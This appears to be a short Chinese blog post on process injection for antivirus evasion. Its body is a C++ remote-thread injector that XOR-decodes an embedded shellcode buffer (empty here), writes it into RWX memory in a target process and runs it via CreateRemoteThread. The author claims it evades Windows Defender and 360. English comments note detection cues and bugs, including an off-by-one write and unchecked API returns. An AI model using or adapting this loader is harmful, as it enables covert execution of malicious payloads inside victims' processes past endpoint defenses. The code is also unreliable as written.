进程注入免杀学习
下面是自写的进程注入代码，已对主要代码进行注释，相关函数如有不懂请查看官方文档；Windows Defender、360全程免杀。
案例
#include <iostream>
#include <windows.h>
int main(int argc, char* argv[])
{
// Classic remote-thread injection: open the target process, allocate an
// RWX region inside it, copy the (XOR-decoded) payload there and start a
// thread on it. From a detection standpoint the observable pattern is a
// cross-process PAGE_EXECUTE_READWRITE allocation followed by a
// CreateRemoteThread whose start address lies in private (non-image) memory.
//unsigned char KEY = 10;
unsigned char shellcode[] =""; // payload, stored XOR-encoded (empty in this listing)
//unsigned char en_shellcode[] = "";
//int n = 0;
HANDLE processHandle;
HANDLE remoteThread;
PVOID remoteBuffer;
// In-place XOR decode with key 10. Note the `<=`: sizeof(shellcode) is the
// byte count, so the last valid index is sizeof(shellcode) - 1 and the final
// iteration writes one element past the end of the array (undefined behaviour).
for (int i = 0; i <= sizeof(shellcode); i++) {
shellcode[i] ^= 10; // 10 is the XOR key
}
/*
*Read the target PID from the command line (argv[1] is used without checking argc)
*Open the target process
*Allocate memory for the shellcode in the target
*Write the shellcode into that memory
*Start a thread in the target at the shellcode address
*Close the process handle
*/
printf("Injecting to PID: %i", atoi(argv[1]));
// None of the Win32 calls below have their return values checked; a NULL
// handle or buffer from one call is passed straight into the next.
processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
// Reserve+commit a readable, writable and executable region in the target.
remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
// Copy the decoded payload into the remote region (bytes-written out-param is NULL).
WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
// Run the payload as a new thread in the target. The returned thread handle
// is stored but never closed.
remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
CloseHandle(processHandle);
return 0;
}